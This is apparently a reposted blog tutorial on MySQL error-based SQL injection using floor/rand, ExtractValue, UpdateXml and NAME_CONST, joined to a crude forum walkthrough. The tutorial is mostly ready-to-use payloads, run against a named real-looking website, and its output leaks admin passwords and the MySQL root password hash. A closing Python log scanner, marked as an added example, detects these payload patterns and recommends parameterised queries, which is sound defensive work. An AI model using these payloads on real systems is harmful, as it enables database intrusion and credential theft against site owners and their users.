MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted on 2015-11-11 19:03:37

1. Errors via floor()

The following payloads can be used. The trick is that floor(rand(0)*2) is evaluated more than once while MySQL builds the GROUP BY temporary table, so the same key is inserted twice and the duplicate-key error message carries the value concatenated in front of it:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace version() with a different expression. For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test payload (0x5c is a backslash, which is not valid at the start of an XPath expression, so the XPath error echoes the string that follows it):

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test payload (0x3a is a colon, which plays the same role as the backslash above):

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the name_const method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
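The following Python script is an added example, not code from the original post or from any project: it classifies URL query strings against the four payload shapes this page shows (floor/rand with GROUP BY, ExtractValue, UpdateXml, NAME_CONST) and flags the MySQL error texts that carry the leaked value, the way a log reviewer or WAF rule author would. The signature names, the (query string, response excerpt) log format and the sample entries are assumptions constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures: every pattern in a list must match the decoded query string.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": [r"floor\s*\(\s*rand\s*\(", r"group\s+by"],
    "extractvalue": [r"extractvalue\s*\(", r"concat\s*\("],
    "updatexml": [r"updatexml\s*\(", r"concat\s*\("],
    "name_const": [r"name_const\s*\(.*name_const\s*\("],
}

# Response-side signatures: the MySQL error texts that carry the leaked value.
RESPONSE_SIGNATURES = {
    "duplicate_entry": r"ERROR 1062.*Duplicate entry '.*' for key",
    "xpath_syntax": r"XPATH syntax error:\s*'",
    "duplicate_column": r"Duplicate column name '",
}

def classify_request(query_string):
    """Names of techniques whose signatures all match the URL-decoded query string."""
    decoded = unquote_plus(query_string)  # '+' and %xx become plain characters
    return [name for name, pats in REQUEST_SIGNATURES.items()
            if all(re.search(p, decoded, re.I | re.S) for p in pats)]

def classify_response(body):
    """Names of MySQL error messages echoed in a response body."""
    return [name for name, p in RESPONSE_SIGNATURES.items() if re.search(p, body, re.I)]

def scan_log(entries):
    """Alert on entries where a payload is seen or a database error is echoed back."""
    alerts = []
    for qs, body in entries:
        techniques, leaks = classify_request(qs), classify_response(body)
        if techniques or leaks:
            alerts.append({"query": qs, "techniques": techniques, "leaks": leaks})
    return alerts

# Constructed sample log entries (query string, response excerpt) built from this page's payloads and errors.
SAMPLE_LOG = [
    ("id=1", "<h1>test</h1><p>do it</p>"),
    ("id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x"
     "+from+information_schema.tables+group+by+x)a)",
     "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"),
    ("id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1)))",
     "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'"),
    ("id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1))",
     "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'"),
    ("id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--",
     "Error: Duplicate column name '5.0.27-community-nt'"),
]
```

scan_log(SAMPLE_LOG) returns four alerts and ignores the benign first entry. The response-side signatures matter as much as the request-side ones: all three error modes depend on the database error reaching the client, so parameterised queries plus generic error pages remove the channel entirely.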
